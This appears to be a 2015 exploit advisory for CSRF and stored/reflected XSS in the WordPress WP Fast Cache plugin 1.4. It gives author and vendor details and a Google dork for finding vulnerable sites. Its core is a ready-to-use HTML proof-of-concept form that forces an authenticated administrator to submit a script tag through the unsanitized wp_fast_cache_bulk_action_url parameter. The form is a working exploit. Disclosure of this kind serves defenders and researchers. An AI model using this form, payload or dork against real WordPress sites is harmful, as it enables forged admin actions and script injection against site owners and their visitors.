WordPress WP Fast Cache plugin version 1.4 suffers from cross site request forgery and cross site scripting vulnerabilities.
ac41aca70c5a88f3a41f984ab0c2e9a4230e3046cb8b4f0c82930a77e26d30c1
######################
# Exploit Title : WP Fast Cache 1.4 and below CSRF Stored/Reflected XSS
# Exploit Author : Claudio Viviani
# Website Author: http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
# Vendor Homepage : https://wordpress.org/plugins/wp-fast-cache/
# Software Link : https://downloads.wordpress.org/plugin/wp-fast-cache.1.4.zip
# Dork Google: index of wp-fast-cache
# Date : 2015-05-11
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# Info:
WP Fast Cache is vulnerable to CSRF attacks, which can also be combined with stored/reflected XSS attacks (authenticated administrators only).
# PoC Exploit:
<html>
Click Here
<form method="post" action="http://10.0.0.67/wordpress/wp-admin/admin.php?page=wp-fast-cache">
<input type="hidden" name="wp_fast_cache_bulk_action" value="cache_this_url">
<input type="hidden" name="wp_fast_cache_bulk_action_url" value="<script>alert(/XSS/)</script>">
<input type="submit" name="submit" value="Submit">
</form>
</html>
wp_fast_cache_bulk_action_url var was not sanitized!
# PoC Video:
http://youtu.be/Z7kV3aWE6mU
Discovered By : Claudio Viviani
http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
http://ffhd.homelab.it (Free Fuzzy Hashes Database)
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################